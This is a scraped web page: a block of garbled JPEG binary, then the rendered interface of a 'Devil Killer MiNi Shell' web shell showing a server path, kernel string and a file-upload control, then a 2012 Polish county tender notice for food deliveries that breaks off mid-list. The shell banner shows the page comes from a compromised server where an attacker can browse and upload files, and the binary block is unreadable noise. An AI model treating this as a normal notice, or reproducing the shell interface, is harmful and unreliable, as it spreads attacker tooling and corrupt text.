JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120201/30352-N-2012.html

<p class="kh_header"><b>Świdwin: Dostawa artykułów żywnościowych w roku 2012</b><br>
<b>Numer ogłoszenia: 30352 - 2012; data zamieszczenia: 01.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych w roku 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I :
1.	Banany	        kg	120
2.	Buraki		
	Miesiąc I-III	kg	100
	Miesiąc IV-VI	kg	60
	Miesiąc VII-IX	kg	25
	Miesiąc X-XII	kg	80
3.	Cebula 		
	Miesiąc I-III	kg	42
	Miesiąc IV-VI	kg	30
	Miesiąc VII-IX	kg	14
	Miesiąc X-XII	kg	55
4.	Fasola Jaś gruba		
	Miesiąc I-III	kg	18
	Miesiąc IV-VI	kg	18
	Miesiąc VII-IX	kg	15
	Miesiąc X-XII	kg	20
5.	Groch polówki	kg	50
6.	Jabłka		
	Miesiąc I-III	kg	180
	Miesiąc IV-VI	kg	145
	Miesiąc VII-IX	kg	65
	Miesiąc X-XII	kg	200
7.	Kapusta kiszona		
	Miesiąc I-III	kg	80
	Miesiąc IV-VI	kg	75
	Miesiąc VII-IX	kg	35
	Miesiąc X-XII	kg	95
8.	Kapusta czerwona	kg	20
9.	Kapusta biała		
	Miesiąc I-III	kg	90
	Miesiąc IV-VI	kg	18
	Miesiąc VII-IX	szt.	20
	Miesiąc X-XII	szt.	25
10.	Kalafior sezon 		
	Miesiąc VIII-X	szt.	15
11.	Koper świeży		
	Miesiąc IV-VI	szt.	15
	Miesiąc VII-IX	szt.	30
	Miesiąc X-XII	szt.	15
12.	Cytryna	kg	30
13.	Kapusta pekińska		
	Miesiąc I-III	kg	30
	Miesiąc IV-VI	kg	17
	Miesiąc VII-IX	kg	10
	Miesiąc X-XII	kg	30
14.	Marchew		
	Miesiąc I-III	kg	70
	Miesiąc IV-VI	kg	65
	Miesiąc VII-IX	kg	55
	Miesiąc X-XII	kg	125
15.	Mandarynki		
	Miesiąc I-II	kg	18
	Miesiąc III-V	kg	5
	Miesiąc X-XII	kg	30
16.	Ogórek kiszony		
	Miesiąc I-III	kg	65
	Miesiąc IV-VI	kg	30
	Miesiąc VII-IX	kg	20
	Miesiąc X-XII	kg	55
17.	Ogórek świeży sezon		
	Miesiąc V-VII	kg	45
	Miesiąc VIII-X	kg	25
18.	Pomidory kl. I sezon		
	Miesiąc VI-X	kg	20
19.	Pory		
	Miesiąc I-III	kg	10
	Miesiąc IV-VI	kg	10
	Miesiąc VII-IX	kg	4
	Miesiąc X-XII	kg	16
20.	Pomarańcze 		
	Miesiąc XII	kg	10
21.	Pieczarki		
	Miesiąc I-III	kg	30
	Miesiąc IV-VI	kg	20
	Miesiąc VII-IX	kg	15
	Miesiąc X-XII	kg	50
22.	Papryka czerwona kl. I 		
	Miesiąc I - VI	kg	12
	Miesiąc  IX-X	kg	10
	Miesiąc XI-XII	kg	8
23.	Pietruszka korzeń		
	Miesiąc I-III	kg	6
	Miesiąc IV-VI	       kg	4
	Miesiąc VII-IX	kg	7
	Miesiąc X-XII	kg	18
24.	Rzodkiew biała	kg	40
25.	Rzodkiewka		
	Miesiąc IV-VI 	pęczek	10
	Miesiąc IX-XI	pęczek	10
26.	Seler korzeń		
	Miesiąc I-III	kg	5
	Miesiąc IV-VI	kg	5
	Miesiąc VIII-IX	kg	10
	Miesiąc X-XII	kg	50
27.	Szczypior		
	Miesiąc I-III	szt.	30
	Miesiąc IV-VI	szt.	25
	Miesiąc VII-IX	szt.	10
	Miesiąc X-XII	      szt.	30
28.	Sałata zielona  		
	Miesiąc IV-VI	szt.	15
	Miesiąc IX-X	szt.	15
29.	Śliwy sezon 		
	Miesiąc IX	kg	10
30.	Truskawki sezon 		
	V-VII	kg	10
31.	Kiwi	szt.	200
32.	Ziemniaki		
	Miesiąc I-III	kg	1100
	Miesiąc IV-VI	kg	900
	Miesiąc VII-IX	kg	400
	Miesiąc X-XII	kg	1100
Część II :
1.	Chleb  zwykły (krojony 0,60 kg)	szt.	1900
2.	Bułka pszenna (0,07kg)	szt.	2000
3.	Chleb graham (krojony 0,40kg)	szt.	400
4.	Chleb razowy (krojony 0,40kg)	szt.	200
5.	Drożdżówki ( 0,10kg)	szt.	100
6.	Pączek ( 0,07kg)	szt.	200
7.	Bułka tarta	kg	30
Część III :
1.	Brokuł  opak. 4 x 2,5kg = 10kg	kg	30
2.	Bukiet warzyw (marchew, kalafior, brokuł ) opak. 4 x 2,5kg = 10kg	kg	60
3.	Fasolka szparagowa opak. 4 x 2,5kg = 10kg	kg	70
4.	Kalafior opak. 4 x 2,5kg = 10kg	kg	50
5.	Marchew karbowana opak. 4x 2,5kg = 10kg	kg	40
6.	Mieszanka. kompotowa         4-składnikowa opak. 4 x 2,5kg = 10kg	kg	700
7.	Mieszanka warzywna 9-składnikowa opak. 4 x 2,5kg = 10kg	kg	80
8.	Mieszanka chińska	kg	40
9.	Groszek zielony opak. 4 x 2,5kg = 10kg	kg	50
10.	Filet rybny z dorsza bez skóry, bez glazury	kg	170
11.	Włoszczyzna paski opak.  4 x 2,5kg = 10kg	kg	250
12.	Pierogi z kapustą i grzybami	kg	30
13.	Kluski śląskie	kg	80
14.	Pyzy z mięsem	kg	80
Część IV:

1.	
Jaja kurze 60 - 70g szt.	 3200
Część V:
1.	Aromaty do ciast (6ml)	szt.	10
2.	Proszek do pieczenia 20g	 szt.	20
3.	Musztarda stołowa 180g	 szt.	25
4.	Budyń b/c (różne smaki) 40 g	szt.	30
5.	Rosół drobiowy w kostce 120g	szt.	60
6.	Cukier kryształ 1 kg	kg	380
7.	Kwasek cytrynowy 20g	szt.	50
8.	Chrzan tarty   270 g 	szt.	50
9.	Cukier waniliowy 20 g	szt.	40
10.	Cynamon 20 g	szt.	10
11.	Dżem wysokosłodzony  /różne smaki/ 270g	szt.	60
12.	Marmolada wieloowocowa 500g	szt.	70
13.	Galaretki owocowe 90 g	szt.	20
14.	Groszek konserwowy 400 g	szt.	40
15.	Keczup 500g	szt.	50
16.	Koncentrat pomidorowy  30% 200g	szt.	100
17.	Koncentrat pomidorowy 30%
850g	szt.	20
18.	Herbata ekspresowa28g	szt.	170
19.	Kukurydza 400g	szt.	40
20.	Majonez 700ml	szt.	70
21.	Majonez 260g	szt.	60
22.	Ogórki konserwowe0,9l	szt.	25
23.	Papryka konserwowa0,9l	szt.	40
24.	Sałatka warzywna0,9l	szt.	35
25.	Szczaw konserwowy0,9l	szt.	10
26.	Kasza gryczana 1kg	kg	60
27.	Kasza jeczmienna 1kg	kg	75
28.	Kakao 100 % - 200 g	szt.	45
29.	Kawa Inka 150 g	szt.	60
30.	Kasza manna 1kg	kg	20
31.	Maka pszenna 1kg	kg	220
32.	Makaron (różne kształty)	kg	200
33.	Płatki kukurydziane	kg	25
34.	Płatki śniadaniowe  (różne smaki)		25
35.	Ryż 1kg	kg	200
36.	Czosnek granulowany 20g	szt.	190
37.	Liść laurowy 6g	szt.	30
38.	Majeranek 150g	szt.	10
39.	Papryka mielona słodka, ostra 20g	szt.	140
40.	Pieprz naturalny mielony 20g	szt.	100
41.	Przyprawa do kurczaka 	kg	3
42.	Przyprawa do ryb	kg	2
43.	Przyprawa do mięsa wieprzowego	kg	3
44.	Sos sojowy 240g  	szt.	15
45.	Ziele angielskie 20g	szt.	25
46.	Pasztet drobiowy 160g	szt.	150
47.	Sałatka z makreli 300g	szt.	80
48.	Mąka ziemniaczana	kg	25
49.	Sól jodowana 1kg	kg	100
50.	Powidła śliwkowe 500g	szt.	30
51.	Syrop owocowy 430ml	szt.	20
52.	Wiórki kokosowe 50g	szt.	20
53.	Fasola czerwona konserwowa 400g	szt.	30
54.	Kisiel bez cukru 40g	kg	30
55.	Rodzynki 100g	szt.	20
56.	Olej uniwersalny 1l	szt.	100
57.	Frytura do smażenia	kg	35
58.	Margaryna 250g	szt.	25
Część VI  :
I Mięso świeże
1.	Szynka wieprzowa b/k	kg	15
2.	Karkówka wieprzowa b/k	kg	90
3.	Schab wieprzowy b/k	kg	100
4.	Łopatka wieprzowa b/k, b/s	kg	450
5.	Wołowina extra	kg	65
6.	Żeberka wieprzowe	kg	               50
7.	Biodrówka	kg	30
8.	Wątroba wieprzowa	kg	30
II Wędliny świeże:
1.	Blok z indyka	kg	20
2.	Baleron z indyka	kg	20
3.	Kiełbasa piwna	kg	45
4.	Kiełbasa śląska	kg	70
5.	Kiełbasa szynkowa	kg	30
6.	Kiełbasa tyrolska	kg	10
7.	Kiełbasa żywiecka	kg	55
8.	Mielonka drobiowa	kg	6
9.	Parówki śląskie	kg	90
10.	Pasztetowa	kg	45
11.	Pieczeń rzymska	kg	62
12.	Polędwica z warzywami	kg	32
13.	Szynka mielona	kg	71
14.	Szynka wieprzowa	kg	40
15.	Wędzonka drobiowa	kg	5
16.	Kaszanka	kg	68
17.	Polędwica drobiowa	kg	47
18.	Kiełbasa zwyczajna	kg	23
19.	Mielonka konserwowa	kg	2
20.	Pieczeń drobiowa	kg	6
21.	Boczek parzony	kg	28
22.	Kiełbasa drobiowa	kg	7
23.	Kiełbasa biała	kg	10
24.	Baton szynkowy drobiowy	kg	5
25.	Filet z indyka pieczony	kg	15
III Mięso drobiowe świeże:
1.	Kurczak	kg	130
2.	Filet z kurczaka surowy	kg	160
3.	Udka z kurczaka	kg	100
4.	Wątróbka drobiowa	kg	30
Część VII:
1.	Jogurt owocowy 115g	szt.	460
2.	Jogurt naturalny 370.	szt.	70
3.	Jogurt owocowy 300g	            szt.	150
4.	Jogurt owocowy 125g	szt.	1250
5.	Masło śmietankowe 82% kostka 200g	kg	210
6.	Mleko 2% świeże	l.	1540
7.	Mleko UHT 2%	l.	640
8.	Serki topione miks krążek 140g	szt.	120
9	Serek topiony  śmietankowy  100 g	szt.	150
10.	Ser żółty gouda/edamski	kg	82
11.	Śmietana 18% 400g	szt.	610
12.	Twaróg półtósty	kg	90
13.	Serek waniliowy  w wiaderku	kg	70.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.80.00.00-6, 15.10.00.00-6, 15.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstąpił od obowiązku wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy:
Wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, minimum 2 dostawy, odpowiadające swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia. Przez dostawę odpowiadającą rodzajem rozumie się cykliczną dostawę żywności przez okres min. 10 miesięcy. Nie określa się minimalnej wartości zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Ośrodek Szkolno-Wychowawczy w Sławoborzu ul. Lepińska 3, 
78-314 Sławoborze
tel. 94 36 470 13, fax. 94 36 470 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2012 godzina 10:00, miejsce: Sekretariat Specjalnego Ośrodka Szkolno-Wychowawczego w Sławoborzu, ul. Lepińska 3, 78-314 Sławoborze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świeże warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Banany	kg	120
2.	Buraki		
	Miesiąc I-III	kg	100
	Miesiąc IV-VI	kg	60
	Miesiąc VII-IX	kg	25
	Miesiąc X-XII	kg	80
3.	Cebula 		
	Miesiąc I-III	kg	42
	Miesiąc IV-VI	kg	30
	Miesiąc VII-IX	kg	14
	Miesiąc X-XII	kg	55
4.	Fasola Jaś gruba		
	Miesiąc I-III	kg	18
	Miesiąc IV-VI	kg	18
	Miesiąc VII-IX	kg	15
	Miesiąc X-XII	kg	20
5.	Groch polówki	kg	50
6.	Jabłka		
	Miesiąc I-III	kg	180
	Miesiąc IV-VI	kg	145
	Miesiąc VII-IX	kg	65
	Miesiąc X-XII	kg	200
7.	Kapusta kiszona		
	Miesiąc I-III	kg	80
	Miesiąc IV-VI	kg	75
	Miesiąc VII-IX	kg	35
	Miesiąc X-XII	kg	95
8.	Kapusta czerwona	kg	20
9.	Kapusta biała		
	Miesiąc I-III	kg	90
	Miesiąc IV-VI	kg	18
	Miesiąc VII-IX	szt.	20
	Miesiąc X-XII	szt.	25
10.	Kalafior sezon 		
	Miesiąc VIII-X	szt.	15
11.	Koper świeży		
	Miesiąc IV-VI	szt.	15
	Miesiąc VII-IX	szt.	30
	Miesiąc X-XII	szt.	15
12.	Cytryna	kg	30
13.	Kapusta pekińska		
	Miesiąc I-III	kg	30
	Miesiąc IV-VI	kg	17
	Miesiąc VII-IX	kg	10
	Miesiąc X-XII	kg	30
14.	Marchew		
	Miesiąc I-III	kg	70
	Miesiąc IV-VI	kg	65
	Miesiąc VII-IX	kg	55
	Miesiąc X-XII	kg	125
15.	Mandarynki		
	Miesiąc I-II	kg	18
	Miesiąc III-V	kg	5
	Miesiąc X-XII	kg	30
16.	Ogórek kiszony		
	Miesiąc I-III	kg	65
	Miesiąc IV-VI	kg	30
	Miesiąc VII-IX	kg	20
	Miesiąc X-XII	kg	55
17.	Ogórek świeży sezon		
	Miesiąc V-VII	kg	45
	Miesiąc VIII-X	kg	25
18.	Pomidory kl. I sezon		
	Miesiąc VI-X	kg	20
19.	Pory		
	Miesiąc I-III	kg	10
	Miesiąc IV-VI	kg	10
	Miesiąc VII-IX	kg	4
	Miesiąc X-XII	kg	16
20.	Pomarańcze 		
	Miesiąc XII	kg	10
21.	Pieczarki		
	Miesiąc I-III	kg	30
	Miesiąc IV-VI	kg	20
	Miesiąc VII-IX	kg	15
	Miesiąc X-XII	kg	50
22.	Papryka czerwona kl. I 		
	Miesiąc I - VI	kg	12
	Miesiąc  IX-X	kg	10
	Miesiąc XI-XII	kg	8
23.	Pietruszka korzeń		
	Miesiąc I-III	kg	6
	Miesiąc IV-VI	       kg	4
	Miesiąc VII-IX	kg	7
	Miesiąc X-XII	kg	18
24.	Rzodkiew biała	kg	40
25.	Rzodkiewka		
	Miesiąc IV-VI 	pęczek	10
	Miesiąc IX-XI	pęczek	10
26.	Seler korzeń		
	Miesiąc I-III	kg	5
	Miesiąc IV-VI	kg	5
	Miesiąc VIII-IX	kg	10
	Miesiąc X-XII	kg	50
27.	Szczypior		
	Miesiąc I-III	szt.	30
	Miesiąc IV-VI	szt.	25
	Miesiąc VII-IX	szt.	10
	Miesiąc X-XII	      szt.	30
28.	Sałata zielona  		
	Miesiąc IV-VI	szt.	15
	Miesiąc IX-X	szt.	15
29.	Śliwy sezon 		
	Miesiąc IX	kg	10
30.	Truskawki sezon 		
	V-VII	kg	10
31.	Kiwi	szt.	200
32.	Ziemniaki		
	Miesiąc I-III	kg	1100
	Miesiąc IV-VI	kg	900
	Miesiąc VII-IX	kg	400
	Miesiąc X-XII	kg	1100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chleb  zwykły (krojony 0,60 kg)	szt.	1900
2.	Bułka pszenna (0,07kg)	szt.	2000
3.	Chleb graham (krojony 0,40kg)	szt.	400
4.	Chleb razowy (krojony 0,40kg)	szt.	200
5.	Drożdżówki ( 0,10kg)	szt.	100
